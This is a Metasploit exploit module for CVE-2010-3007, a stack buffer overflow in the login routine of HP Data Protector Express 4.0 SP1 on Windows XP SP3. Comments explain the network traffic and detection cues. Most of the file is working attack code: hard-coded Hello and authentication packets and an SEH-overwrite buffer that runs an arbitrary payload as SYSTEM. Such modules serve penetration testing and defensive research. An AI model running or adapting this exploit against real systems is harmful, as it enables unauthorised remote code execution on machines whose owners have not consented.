##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2010-3007 (see 'References' below): a
# stack buffer overflow in the DtbClsLogin routine of HP Data Protector
# Express 4.0 SP1, reached through the service's authentication request.
# The only target is the Windows XP SP3 / build 43064 combination listed
# under 'Targets'; the return address is a pop/pop/ret from ifsutil.dll, so
# the module is not expected to work as-is against other builds or OS versions.
#
# Defensive notes, grounded in the traffic this module generates:
#   - both #check and #exploit open a TCP connection (RPORT, default 3817)
#     and send the same fixed "Hello" packet, which carries the literal bytes
#     "Dtb: Context" and a 15-character random alphabetic machine name;
#   - #exploit follows with an authentication packet (cmd id 0x18) whose
#     username field is roughly 100 KB long -- a size no legitimate login
#     produces and a simple length threshold for network detection.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata (name, description, references, payload
  # constraints, targets) and the RPORT option.
  #
  # @param info [Hash] metadata merged through update_info before super runs
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HP Data Protector DtbClsLogin Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The
        overflow occurs during the login process, in the DtbClsLogin function provided by
        the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an
        insecure way with the username. A successful exploitation will lead to code execution
        with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server
        Service) process, which runs as SYSTEM by default.
      },
      'Author' =>
        [
          'AbdulAziz Hariri', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2010-3007' ],
          [ 'OSVDB', '67973' ],
          [ 'BID', '43105' ],
          [ 'ZDI', '10-174' ],
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535' ]
        ],
      'Payload' =>
        {
          # 'Space' equals the target 'Offset' below: the payload plus its
          # padding must exactly fill the buffer in front of the SEH record.
          'Space' => 712,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3',
            {
              'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
              'Offset' => 712
            }
          ]
        ],
      'DefaultTarget' => 0,
      'Privileged' => true,
      'DisclosureDate' => '2010-09-09'
    ))
    register_options(
      [
        Opt::RPORT(3817),
      ])
  end

  # Fingerprints the service: sends the Hello packet and reports Detected when
  # the reply contains "Dtb: Context". The same string is embedded in the
  # request itself and no version information is parsed, so the result is
  # Detected rather than Vulnerable -- it means a Data Protector service is
  # answering, not that it is unpatched.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    connect

    machine_name = rand_text_alpha(15)

    print_status("#{sock.peerinfo} - Sending Hello Request")
    # Fixed Hello packet; the meaning of most hard-coded fields is not
    # documented in this module. The random machine name is NUL-terminated.
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00"
    hello << machine_name << "\x00"
    # Bytes 0x44 0x74 0x62 0x3a 0x20 0x43 0x6f 0x6e 0x74 0x65 0x78 0x74 spell
    # the ASCII string "Dtb: Context" that the response is later matched against.
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"

    sock.put(hello)
    hello_response = sock.get_once(-1, 10) # read whatever arrives within 10 seconds
    disconnect

    if hello_response and hello_response =~ /Dtb: Context/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe

  end

  # Sends the Hello packet, then an authentication request whose username
  # field holds the encoded payload, random padding, an SEH record and a
  # short backward jump, followed by ~100 KB of filler to force the exception.
  # Gives up without sending the authentication request if the Hello gets no
  # reply.
  #
  # @return [void]
  def exploit

    connect

    machine_name = rand_text_alpha(15)

    print_status("#{sock.peerinfo} - Sending Hello Request")
    # Same fixed Hello packet as in #check (see the comments there).
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00"
    hello << machine_name << "\x00"
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"

    sock.put(hello)
    hello_response = sock.get_once(-1, 10) # read whatever arrives within 10 seconds

    # Unlike #check, the response content is not inspected here; only its
    # presence gates the rest of the exploit.
    if not hello_response or hello_response.empty?
      print_error("#{sock.peerinfo} - The Hello Request hasn't received a response")
      return
    end

    # Username buffer layout:
    #   payload | random padding up to 'Offset' (712) | SEH record -> target.ret |
    #   jmp back 'Offset' + 8 bytes (over the payload, padding and the 8-byte
    #   SEH record, i.e. to the start of the payload) | ~100 KB random filler
    bof = payload.encoded
    # Never negative as long as the framework honours the 'Space' limit of 712.
    bof << rand_text(target['Offset']-bof.length)
    bof << generate_seh_record(target.ret)
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']+8}").encode_string
    # The line below is used to trigger the exception; don't be confused by the big size.
    # There are only some bytes available until the end of the stack, but this much filler
    # assures the exception even when there are mappings for dynamic memory after the stack.
    # To assure reliability it is therefore better to jump back (see the jmp above).
    bof << rand_text(100000)

    header = [0x8451].pack("V") # packet id
    header << [0x32020202].pack("V") # svc id
    header << [0x00000018].pack("V") # cmd id
    header << [0].pack("V") # pkt length, calculated after pkt has been built
    header << "\x00\x00\x00\x00" # ?Unknown?

    # NOTE: this is an alias, not a copy -- appending to pkt_auth also mutates
    # header. Harmless here because header is not used again afterwards.
    pkt_auth = header
    pkt_auth << bof # username

    # Patch the little-endian length placeholder at offset 12 with the final
    # packet length, header included.
    pkt_auth[12, 4] = [pkt_auth.length].pack("V")

    print_status("#{sock.peerinfo} - Sending Authentication Request")

    sock.put(pkt_auth)
    disconnect
  end
end